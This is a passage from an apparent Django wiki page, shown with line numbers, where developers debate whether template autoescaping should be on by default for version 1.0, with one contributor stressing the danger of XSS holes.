| 68 | | === Autoescape === |
| 69 | | |
| 70 | | Autoescape only changed APIs if it was on by default. But I've (Michael Radziej) followed |
| 71 | | the discussion very closely, and I'm sure that the main reaction of the |
| 72 | | community was strictly against this. autoescape is my own favorite pet, |
| 73 | | but when I apply my own criteria, it wouldn't be a candidate for 1.0. |
| 74 | | One could argue that it will deeply affect the way templates are written |
| 75 | | and that they are an important step to make django applications safe, |
| 76 | | but the consensus about it was not that strong. Or do we want to use it |
| 77 | | in the admin? -- mir |
| 78 | | |
| 79 | | For people trying to catch up on the discussion, there are a few long threads in the django-developers archives. Two good places to start are probably [http://groups.google.com/group/django-developers/browse_frm/thread/17d1dfecd67864ab?q=autoescape& an early discussion here] and the discussion around [http://groups.google.com/group/django-developers/browse_frm/thread/7caeb86c04b81f10/9ea28abb20020437?lnk=gst&q=autoescape+willison&rnum=1#9ea28abb20020437 the original patch]. -- Malcolm. |
| 80 | | |
| 81 | | See also AutoEscaping and [wiki:"AutoEscape alternative" Autoescape alternative]. |
| 82 | | |
| 83 | | I'm becoming more and more convinced that auto-escaping needs to be on by default. XSS holes totally compromise the security of your application - they are the "root" attack of the Web. They are stupidly easy to introduce - even Google has had them. If you aren't convinced, take a look at the notes I've collected about them: http://simonwillison.net/tags/xss/ -- Simon |